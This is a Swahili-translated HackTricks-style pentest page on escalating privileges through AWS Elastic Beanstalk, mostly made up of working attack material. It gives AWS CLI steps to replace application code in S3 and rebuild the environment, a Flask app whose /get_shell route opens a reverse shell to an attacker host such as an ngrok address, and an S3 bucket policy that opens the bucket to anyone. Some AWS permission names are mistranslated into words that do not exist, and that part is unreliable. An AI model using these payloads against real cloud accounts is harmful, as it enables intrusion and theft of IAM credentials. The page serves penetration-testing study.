Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Elastic Beanstalk Privesc

unga mkono HackTricks

Elastic Beanstalk

Maelezo zaidi kuhusu Elastic Beanstalk yamo:

AWS - Elastic Beanstalk Enum

Ili kutekeleza vitendo vyenye hisia kwenye Beanstalk, utahitaji kuwa na idhini nyingi za hisia katika huduma nyingi tofauti. Unaweza kuchunguza kwa mfano idhini zilizotolewa kwa arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk

elasticbeanstalk:RebuildEnvironment, ruhusa za kuandika S3 & nyingine nyingi

Kwa ruhusa za kuandika kwenye kisanduku cha S3 kinachohifadhi mimbo ya mazingira na ruhusa za kujenga upya maombi (inahitajika elasticbeanstalk:RebuildEnvironment na zingine kadhaa zinazohusiana na S3, EC2 na Cloudformation), unaweza kurekebisha mimbo, kujenga upya programu na wakati ujao unapofikia programu hiyo ita utekeleza kificho chako kipya, ikiruhusu mshambuliaji kudhoofisha programu na sifa za jukumu la IAM zake.

# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"

elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, na zaidi...

Zilizotajwa pamoja na idadi kadhaa ya ruhusa za S3, EC2, cloudformation, autoscaling na elasticloadbalancing ni muhimu kwa kujenga mazingira ya Elastic Beanstalk kutoka mwanzo.

  • Unda maombi ya AWS Elastic Beanstalk:

aws elasticbeanstalk create-application --application-name MyApp
aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role

Ikiwa mazingira tayari yameundwa na hautaki kuunda jipya, unaweza tu kuboresha lile lililopo.

  • Pakia nambari ya programu yako na mahitaji yake katika faili ya ZIP:

zip -r MyApp.zip .

  • Pakia faili la ZIP kwenye ndoo ya S3:

aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip

  • Unda toleo la programu ya AWS Elastic Beanstalk:

aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"

  • Weka toleo la maombi kwenye mazingira yako ya AWS Elastic Beanstalk:

aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

elasticbeanstalk:UndaMsimboWaMaombi, elasticbeanstalk:SasishaMazingira, cloudformation:PataKiolesura, cloudformation:ElezaVifaaVyaMfumo, cloudformation:ElezaKifaaChaMfumo, autoscaling:ElezaVikundiVyaUkubwa, autoscaling:SitishaMichakato, autoscaling:SitishaMichakato

Kwanza kabisa unahitaji kuunda mazingira halali ya Beanstalk na msimbo ungependa kukimbia kwa mwendazake kufuata hatua za awali. Kuna uwezekano wa zipu rahisi inayojumuisha faili hizi 2:

from flask import Flask, request, jsonify
import subprocess,os, socket

application = Flask(__name__)

@application.errorhandler(404)
def page_not_found(e):
return jsonify('404')

@application.route("/")
def index():
return jsonify('Welcome!')


@application.route("/get_shell")
def search():
host=request.args.get('host')
port=request.args.get('port')
if host and port:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,int(port)))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
return jsonify('done')

if __name__=="__main__":
application.run()

Baada ya kuwa na mazingira yako ya Beanstalk yakiendesha rev shell yako, ni wakati wa kuhamisha kwa mazingira ya waathiriwa. Ili kufanya hivyo, unahitaji kuboresha Sera ya Ndoo ya ndoo yako ya S3 ya beanstalk ili mwathiriwa aweze kufikia (Tafadhali kumbuka kuwa hii itafungua Ndoo kwa KILA MTU):

{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:GetObject",
"s3:GetObjectVersion",
"s3:*"
],
"Resource": [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
},
{
"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
"Effect": "Deny",
"Principal": {
"AWS": "*"
},
"Action": "s3:DeleteBucket",
"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}
# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528

Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).

The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.
Support HackTricks
PreviousAWS - EFS PrivescNextAWS - EMR Privesc

Last updated